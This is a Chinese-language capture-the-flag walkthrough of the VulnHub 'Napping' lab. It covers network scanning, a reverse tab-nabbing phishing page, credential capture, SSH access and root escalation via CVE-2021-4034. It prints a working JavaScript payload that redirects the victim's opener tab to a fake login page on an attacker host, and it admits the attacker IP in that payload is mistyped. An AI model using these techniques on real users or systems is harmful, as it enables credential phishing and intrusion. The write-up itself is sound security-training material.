Napping
攻擊機kali:192.168.0.105
靶機:192.168.0.103(使用virtualbox搭建)
下載地址:https://download.vulnhub.com/napping/napping-1.0.1.ova
一 · 靶機的發現與資訊蒐集:
使用 networkdiscover 掃描當前網段,發現靶機ip為 192.168.0.103
networkdiscover -i eth0 -r 192.168.0.0/24
獲取ip地址後掃描當前靶機開放埠,發現僅開放 22、80埠
nmap -p1-65535 -sV -n -A 192.168.0.103
掃描當前站點web目錄,沒有找到特別的發現。開始在網站的功能點上尋找漏洞
[09:23:44] 200 - 0B - /config.php
[09:23:48] 200 - 1KB - /index.php
[09:23:48] 200 - 1KB - /index.php/login/
[09:23:50] 302 - 0B - /logout.php -> index.php
[09:23:55] 200 - 2KB - /register.php
[09:23:56] 403 - 278B - /server-status
訪問當前靶機80埠,註冊後發現站點是一個部落格推廣網站,中間部分能填寫當前部落格的網址。
還有一個重置密碼和一個登出的按鈕,我們留著後面再試
填寫連結後點選按鈕會開啟新標籤頁到填寫連結的地址,使用 dnslog 測試後發現存在ssrf
二 · 漏洞發現
1 · 對管理員的釣魚
(1)檢視頁面原始碼
描述中說到了,所有提交的連結都將由管理員稽核。是否就意味著管理員會檢視提交的 URL 所指向的內容。
檢視頁面原始碼發現應存在一處 Tab Nabbing 漏洞。下面是一個網上找到的比較通俗易懂的解釋:https://kebingzao.com/2020/05/14/a-target-blank/
再來看靶機頁面的原始碼,target="_bank" 說明了此處確實是有可能存在這一個漏洞的。
(2)開始釣魚
使用wget 把登入頁面的原始碼下載下來,然後再製作一個惡意連結。
wget http://192.168.0.103/index.php
我們將惡意的偽造頁面儲存為 index.html ,將含有惡意 js 程式碼的頁面儲存為 evil.html
釣魚頁面原始碼:
<!DOCTYPE html>
<html>
<head>
<title>My Blog</title>
</head>
<body>
<script>
if(window.opener) window.opener.parent.location.replace('http://192.168.0.104/index.html');
if(window.opener != window) window.opener.parent.location.replace('http://192.168.0.104/index.html');
</script>
</body>
</html>
隨後將兩個頁面分別放進 /var/www/html 資料夾下,並使用python3開啟 80 埠web服務
python3 -m http.server 80
將連結放在 blog link 框中後,在執行 web服務的主機上使用監聽程式監聽流量(這裡打錯了,應該是 192.168.0.105)
成功使用 wireshark 看到魚兒上鉤了
三 · 獲取shell並提權
使用獲取的賬號密碼登入 站點後臺,發現密碼錯誤。而後登入 ssh 成功連線。
上傳提權輔助指令碼,下載地址:https://github.com/mzet-/linux-exploit-suggester
成功使用 CVE-2021-4034 提權為root,並進入 root目錄
